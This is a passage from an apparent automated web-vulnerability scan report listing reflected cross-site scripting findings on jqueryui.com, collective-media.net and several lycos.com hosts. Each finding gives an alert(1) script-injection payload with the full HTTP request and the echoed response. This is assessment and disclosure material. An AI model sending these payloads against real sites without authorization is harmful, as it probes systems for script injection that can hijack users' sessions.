ityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120061

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.112. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b29"><script>alert(1)</script>6aefc48648e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.113. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d012"><script>alert(1)</script>1062076bf26 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.114. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd14c"><script>alert(1)</script>f7a209fba9 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.115. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e33"><script>alert(1)</script>b5761ac56ec was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.116. http://k.collective-media.net/cmadj/cm.idg_b2c/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.idg_b2c/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b947'-alert(1)-'faa1d4c7922 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.idg_b2c5b947'-alert(1)-'faa1d4c7922/;sz=728x90;net=cm;ord=5241744;env=ifr;ord1=854900;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:27:46 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7380

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-57666374_1292164066","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c5b947'-alert(1)-'faa1d4c7922&size=728x90&referrer=http%3A%2F%2Fmail.lycos.com%2Flycos%2FIndex.lycos&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c5b947%27-alert%281%29-%27faa1d4c7922%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-57666374_1
...[SNIP]...

1.117. http://k.collective-media.net/cmadj/cm.idg_b2c/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.idg_b2c/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee53c'-alert(1)-'3c2da3549e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.idg_b2c/;sz=ee53c'-alert(1)-'3c2da3549e8 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7288
Date: Sun, 12 Dec 2010 14:34:24 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41320597_1292164464","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c&size=ee53c'-alert(1)-'3c2da3549e8&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41320597_1292164464%2C%2Cnone%2C%3B%3Bcmw%3Dnurl%3Bsz%3Dee53c%27-alert%281%29-%273c2da3549e8%3Bcontx%3Dnone
...[SNIP]...

1.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2147"><script>alert(1)</script>caa0e56bdf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1 HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1&mobile=1">
...[SNIP]...

1.119. http://peoplesearch.lycos.com/ [search-type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f361d"><script>alert(1)</script>60b9214b859 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859&mobile=1">
...[SNIP]...

1.120. http://peoplesearch.lycos.com/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7863b"><script>alert(1)</script>a804a600e0d was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people7863b"><script>alert(1)</script>a804a600e0d HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people7863b"><script>alert(1)</script>a804a600e0d&mobile=1">
...[SNIP]...

1.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353e6"><script>alert(1)</script>5876eddc96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?353e6"><script>alert(1)</script>5876eddc96c=1 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?353e6"><script>alert(1)</script>5876eddc96c=1&mobile=1">
...[SNIP]...

1.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://registration.lycos.com
Path:   /forgot.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f715"><script>alert(1)</script>0a78a0c622c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgot.php/4f715"><script>alert(1)</script>0a78a0c622c HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:51 GMT
Server:
Set-Cookie: PENTA=174.121.222.18.1292164491267196; path=/; domain=.lycos.com
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sat, 12-Dec-2009 14:34:50 GMT
Set-Cookie: isMobile=mobile; expires=Sun, 12-Dec-2010 15:34:51 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5935
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="http://hb
...[SNIP]...
<form action="/forgot.php/4f715"><script>alert(1)</script>0a78a0c622c" method="post">
...[SNIP]...

1.123. http://search.lycos.com/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a61f"><script>alert(1)</script>cb2791bb9c4 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images6a61f"><script>alert(1)</script>cb2791bb9c4 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17603

